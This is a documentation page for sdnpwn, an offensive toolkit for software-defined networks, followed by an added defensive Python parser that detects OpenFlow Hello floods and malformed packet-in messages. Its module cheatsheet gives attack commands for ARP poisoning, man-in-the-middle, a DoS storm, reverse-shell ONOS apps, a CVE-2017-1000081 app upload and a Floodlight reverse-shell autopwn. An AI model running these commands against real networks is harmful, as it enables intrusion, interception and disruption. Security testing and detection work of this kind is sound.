Get sdnpwn

The latest version of sdnpwn can be found on Github.

Now available on BlackArch Linux!

Getting Started

The basic usage of sdnpwn is like so:

./sdnpwn.py <module name> <options>

An article introducing sdnpwn and its basic usage can be found here.

Module Cheatsheet

Functionality in sdnpwn is separated into different modules. Each module is responsible for a particular attack or action. See below for example usage of each module.

Reconnaissance

  • arpmon
    ./sdnpwn.py arpmon -i eth0 -m watch #Dump information from ARP traffic seen at interface eth0 
    ./sdnpwn.py arpmon -i eth0 -m map #Map MAC addresses to IP addresses
  • sdn-detect
    ./sdnpwn.py sdn-detect #Test using default gateway with ARP traffic
    ./sdnpwn.py sdn-detect -t 192.168.0.29 -m icmp #Test using host 192.168.0.29 using ICMP traffic
    ./sdnpwn.py sdn-detect -c 100 -v #Test using 100 ARP messages. Print additional output.
  • controller-detect
    ./sdnpwn.py controller-detect -i eth0 --lldp #Test using observed LLDP messages at interface eth0
    ./sdnpwn.py controller-detect -t 192.168.0.3 #Test northbound interface of controller at 192.168.0.3
  • of-scan
    ./sdnpwn.py of-scan -t 192.168.1.1 #Scan default ports 6633 and 6653 for OpenFlow service
    ./sdnpwn.py of-scan -t 192.168.1.1 -p 1000-10000 #Scan port range for OpenFlow service

Management

  • help
    ./sdnpwn.py help #Print sdnpwn help
  • mods
    ./sdnpwn.py mods #Print a list of all executable modules
    ./sdnpwn.py mods -s lfa #Search modules for a module with "lfa" in its name
    ./sdnpwn.py mods -n new-mod #Create a new module named "new-mod"
    ./sdnpwn.py mods -r new-mod #Remove module named "new-mod"
  • info
    ./sdnpwn.py info test-mod #Print information for module named "test-mod"
  • system
    ./sdnpwn.py system ifconfig #Run ifconfig command on the system

Attack

  • lfa-relay
    ./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay bridge #Relay LLDP frames between eth0 and eth1
    ./sdnpwn.py lfa-relay --iface1 eth0 --iface2 eth1 --relay tunnel \
     --tunnel-local 192.168.70.1 --tunnel-remote 192.168.70.2 #Relay LLDP frames through a remote tunnel
  • lfa-scapy
    ./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 #Relay LLDP frames between eth0 and eth1
    ./sdnpwn.py lfa-scapy --iface1 eth0 --iface2 eth1 --script mitm.py #Pass relayed traffic through a custom script
  • lldp-replay
    ./sdnpwn.py lldp-replay -i eth0 -w lldpcap.cap #Capture LLDP frame to file lldpcap.cap
    ./sdnpwn.py lldp-replay -i eth0 -r lldpcap.cap #Replay LLDP frame from file lldpcap.cap
  • host-location-hijack
    ./sdnpwn.py host-location-hijack --iface eth0 --target 192.168.56.7 #Hijack location of 192.168.56.7
  • of-switch
    ./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf #Connect to controller at 192.168.1.1 on port 6653 using of-switch.conf configuration
    ./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf -l 8888 #Open relay proxy on port 8888
    ./sdnpwn.py of-switch -c 192.168.1.1 -p 6653 --config confs/of-switch.conf -o eth0 #Output packet-out payloads to eth0
  • of-gen
    ./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 --hello #Send OF Hello message to 192.168.7.8:6633 
    ./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 -c 1000 -d .001 --hello #Flood OF Hello messages 
    ./sdnpwn.py of-gen -t 192.168.7.8 -p 6633 --packet-in --xid 0 --buffer-id 0 --in-port 1 \
     --reason action --total-length 65353 --data-scapy "Ether()/IP()/TCP()" #Send arbitrary packet-in message
  • onos-app
    ./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell #Build netcat based reverse shell app from template
    ./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell -c #Modify configuration for app before build
    ./sdnpwn.py onos-app -b apps/onos-nc-reverse-shell -k #Build app and keep source folder
  • onos-app-upload
    ./sdnpwn.py onos-app-upload -t 192.168.23.100 -p 8181 -a apps/compiled_apps/securearp.oar #Exploit CVE-2017-1000081 to upload app from compiled apps folder
  • floodlight-debug-autopwn
    ./sdnpwn.py floodlight-debug-autopwn -t 127.0.0.1 -l 127.0.0.1:8888 #Set up listener and get reverse shell on port 8888
    ./sdnpwn.py floodlight-debug-autopwn -t 127.0.0.1 -r #Do not set up a listener. Use this if you're using another program to listen for the shell
  • dp-arp-poison
    ./sdnpwn.py dp-arp-poison -i eth0 -v 192.168.1.2 -t 192.168.1.3 -m de:ad:be:ef:ba:11 #Poison 192.168.1.3 in ARP cache of 192.168.1.2 with MAC of de:ad:be:ef:ba:11
  • dp-mitm
    ./sdnpwn.py dp-mitm --iface eth0 --target1 192.168.1.2 --gateway #MITM connection from target to gateway
  • phantom-host-scan
    ./sdnpwn.py phantom-host-scan --iface eth0 --target-ip 192.168.1.2 --ports 22,23 --phantom-ip 192.168.1.5 #Scan ports 22 and 23 using the phantom host scan
  • phantom-storm
    ./sdnpwn.py phantom-storm --iface eth0 --target 192.168.1.0/24 --phantom-ip 192.168.1.5 --packets 1000 #Launch phantom storm DoS attack against network 192.168.1.0/24 with 1000 packets
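The of-scan and of-gen modules above target the OpenFlow control channel (ports 6633/6653, OF Hello floods, packet-in messages with an arbitrary --total-length). From the defender's side the same wire format can be parsed to spot those messages. The following is an added example, not part of sdnpwn: it decodes OpenFlow 1.0 headers (the version spoken on port 6633) from one connection's byte stream and flags a Hello flood and a packet-in whose total_len does not match the payload it carries. The sample stream, the hello_limit threshold and the function names are constructed here for illustration.

```python
"""Parse OpenFlow 1.0 messages and flag anomalies of the kind of-gen produces:
Hello floods and packet-in messages whose total_len disagrees with the data
actually carried. Added example with a constructed sample stream."""
import struct
from collections import Counter

OFP_VERSION_10 = 0x01
OFPT_HELLO = 0          # OpenFlow 1.0 message type codes
OFPT_PACKET_IN = 10
HEADER = struct.Struct("!BBHI")        # version, type, length, xid
PKTIN_FIXED = struct.Struct("!IHHBx")  # buffer_id, total_len, in_port, reason, pad

def parse_messages(stream: bytes):
    """Split a byte stream into (type, xid, body) tuples; stop at a bad header."""
    msgs, off = [], 0
    while off + HEADER.size <= len(stream):
        version, mtype, length, xid = HEADER.unpack_from(stream, off)
        if version != OFP_VERSION_10 or length < HEADER.size or off + length > len(stream):
            break  # malformed or truncated; a collector would log this and drop the connection
        msgs.append((mtype, xid, stream[off + HEADER.size:off + length]))
        off += length
    return msgs

def find_anomalies(stream: bytes, hello_limit: int = 5):
    """Return findings for one OpenFlow connection's byte stream (threshold is assumed)."""
    findings = []
    msgs = parse_messages(stream)
    counts = Counter(mtype for mtype, _, _ in msgs)
    if counts[OFPT_HELLO] > hello_limit:
        findings.append(f"hello flood: {counts[OFPT_HELLO]} HELLO messages on one connection")
    for mtype, xid, body in msgs:
        if mtype != OFPT_PACKET_IN or len(body) < PKTIN_FIXED.size:
            continue
        buffer_id, total_len, in_port, reason = PKTIN_FIXED.unpack_from(body)
        data_len = len(body) - PKTIN_FIXED.size
        if total_len != data_len:  # e.g. --total-length 65353 on a tiny scapy payload
            findings.append(f"packet-in xid={xid} claims total_len={total_len} but carries {data_len} bytes")
    return findings

def build(mtype: int, xid: int, body: bytes = b"") -> bytes:
    """Encode one OpenFlow 1.0 message; used only to construct the sample input."""
    return HEADER.pack(OFP_VERSION_10, mtype, HEADER.size + len(body), xid) + body

# Constructed sample: eight Hellos in a row, then a packet-in with an inflated total_len.
SAMPLE = b"".join(build(OFPT_HELLO, i) for i in range(8))
SAMPLE += build(OFPT_PACKET_IN, 0, PKTIN_FIXED.pack(0, 65353, 1, 1) + b"\x00" * 14)

if __name__ == "__main__":
    for finding in find_anomalies(SAMPLE):
        print(finding)
```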